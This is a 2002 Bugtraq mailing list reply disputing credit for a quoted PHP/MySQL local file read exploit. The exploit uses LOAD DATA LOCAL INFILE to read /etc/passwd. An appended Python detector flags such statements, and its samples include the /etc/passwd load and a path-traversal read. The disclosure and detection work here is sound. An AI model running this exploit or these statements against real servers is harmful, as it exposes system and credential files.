Bugtraq mailing list archives

Re: File reading vulnerable in PHP and MySQL (Local Exploit)


From: Dave Wilson <dw () botanicus net>
Date: Wed, 27 Nov 2002 09:54:58 +0000

Hi there,

Please see http://botanicus.net/dw/sec.html - I wrote about this in
February. Prior to that, other people have claimed to have come across
this too.

On Tue, Nov 26, 2002 at 10:57:52AM -0000, Hai Nam Luke wrote:

Attacker can use PHP and mySQL to read some local file following this way:

# Create a database (mySQL) and upload this file to your server
PHP Code: viewfile.php (programmed by Luke)

======================================================
<?
// config this data
$dbhost = "";
$dbuser = "";
$dbpasswd = "";
$dbname = "";
$file = "/etc/passwd"; // filename that you wanna view 

// shell code
echo "<pre>";

mysql_connect ($dbhost, $dbuser, $dbpasswd);
$sql = array (
   "USE $dbname",

   'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time()) . ' (a LONGBLOB)',

   "LOAD DATA LOCAL INFILE '$file' INTO TABLE $tbl FIELDS "
   . "TERMINATED BY       '__THIS_NEVER_HAPPENS__' "
   . "ESCAPED BY          '' "
   . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",

   "SELECT a FROM $tbl LIMIT 1"
);


Umm, this is my code. Please check any good Bugtraq archive for proof of
this fact. This is pretty much identical, except my English is better
:-).

Luke (HVA)
http://www.hackervn.net

Dave Wilson.
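
A defensive check for the statement pattern quoted above, as an added example that is not part of the original thread: it scans SQL statements (constructed samples, such as a MySQL general query log would record) for LOAD DATA LOCAL INFILE and flags reads outside an assumed import directory or loads that use identical field and line terminators. ALLOWED_DIR, audit() and the sample statements are assumptions made for illustration.

```python
import posixpath
import re

# Assumption: the only directory client-side imports should ever read from.
ALLOWED_DIR = "/var/imports"

LOAD_RE = re.compile(
    r"LOAD\s+DATA\s+(?:LOW_PRIORITY\s+|CONCURRENT\s+)?LOCAL\s+INFILE\s+'([^']*)'",
    re.IGNORECASE)
FIELDS_RE = re.compile(r"(?:FIELDS|COLUMNS)\s+TERMINATED\s+BY\s+'([^']*)'", re.IGNORECASE)
LINES_RE = re.compile(r"LINES\s+TERMINATED\s+BY\s+'([^']*)'", re.IGNORECASE)


def _first(regex, text):
    m = regex.search(text)
    return m.group(1) if m else None


def audit(statements, allowed_dir=ALLOWED_DIR):
    """Return one finding per LOAD DATA LOCAL INFILE statement."""
    findings = []
    for sql in statements:
        m = LOAD_RE.search(sql)
        if not m:
            continue
        path = posixpath.normpath(m.group(1))  # collapses ../ segments
        outside = not (path == allowed_dir or path.startswith(allowed_dir + "/"))
        fields, lines = _first(FIELDS_RE, sql), _first(LINES_RE, sql)
        # Identical field and line terminators are the marker of the
        # single-cell load used in the quoted viewfile.php.
        single_cell = fields is not None and fields == lines
        findings.append({"path": path, "outside_allowed_dir": outside,
                         "single_cell": single_cell,
                         "suspicious": outside or single_cell})
    return findings


# Constructed sample statements (not taken from a real log).
SAMPLE = [
    "LOAD DATA LOCAL INFILE '/var/imports/orders.csv' INTO TABLE orders "
    "FIELDS TERMINATED BY ',' LINES TERMINATED BY '\\n'",
    "LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE A1038390898 FIELDS "
    "TERMINATED BY '__THIS_NEVER_HAPPENS__' ESCAPED BY '' "
    "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",
    "SELECT a FROM A1038390898 LIMIT 1",
    "load data local infile '/var/imports/../../etc/hosts' into table t",
]

if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print(finding)
```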

